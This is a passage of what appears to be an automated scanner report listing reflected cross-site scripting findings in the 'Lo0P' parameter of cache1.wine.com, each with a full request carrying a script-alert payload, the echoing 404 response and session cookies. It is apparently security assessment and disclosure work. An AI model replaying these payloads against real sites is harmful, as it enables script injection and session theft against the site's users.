Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingST.gif?Lo0P=c2a1f<script>alert(1)</script>8dad4a9f8d2 was not found on this server.<P>
...[SNIP]...

1.78. http://cache1.wine.com/images/ratingWS.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/ratingWS.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 6a08e<script>alert(1)</script>3e83de815ed was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingWS.gif?Lo0P=6a08e<script>alert(1)</script>3e83de815ed HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingWS.gif?Lo0P=6a08e<script>alert(1)</script>3e83de815ed was not found on this server.<P>
...[SNIP]...

1.79. http://cache1.wine.com/images/stewardship/stewardship_guy_small.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/stewardship/stewardship_guy_small.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 13ebd<script>alert(1)</script>59fb5a67311 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/stewardship/stewardship_guy_small.gif?Lo0P=13ebd<script>alert(1)</script>59fb5a67311 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 280
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/stewardship/stewardship_guy_small.gif?Lo0P=13ebd<script>alert(1)</script>59fb5a67311 was not found on this server.<P>
...[SNIP]...

1.80. http://cache1.wine.com/includes/css/defaultsixC.css [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /includes/css/defaultsixC.css

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload aac4a<script>alert(1)</script>5082988028e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/css/defaultsixC.css?v=634305316255490024&Lo0P=aac4a<script>alert(1)</script>5082988028e HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 285
Date: Mon, 14 Feb 2011 17:16:04 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /includes/css/defaultsixC.css?v=634305316255490024&Lo0P=aac4a<script>alert(1)</script>5082988028e was not found on this server.<P>
...[SNIP]...

1.81. http://cache1.wine.com/labels/102367m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /labels/102367m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 62df8<script>alert(1)</script>1662841db6b was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/102367m.jpg?Lo0P=62df8<script>alert(1)</script>1662841db6b HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/102367m.jpg?Lo0P=62df8<script>alert(1)</script>1662841db6b was not found on this server.<P>
...[SNIP]...

1.82. http://cache1.wine.com/labels/105835m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /labels/105835m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c1ed1<script>alert(1)</script>c02641efb91 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/105835m.jpg?Lo0P=c1ed1<script>alert(1)</script>c02641efb91 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/105835m.jpg?Lo0P=c1ed1<script>alert(1)</script>c02641efb91 was not found on this server.<P>
...[SNIP]...

1.83. http://cache1.wine.com/labels/108120m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /labels/108120m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 37aab<script>alert(1)</script>556d3b6bc7c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/108120m.jpg?Lo0P=37aab<script>alert(1)</script>556d3b6bc7c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/108120m.jpg?Lo0P=37aab<script>alert(1)</script>556d3b6bc7c was not found on this server.<P>
...[SNIP]...
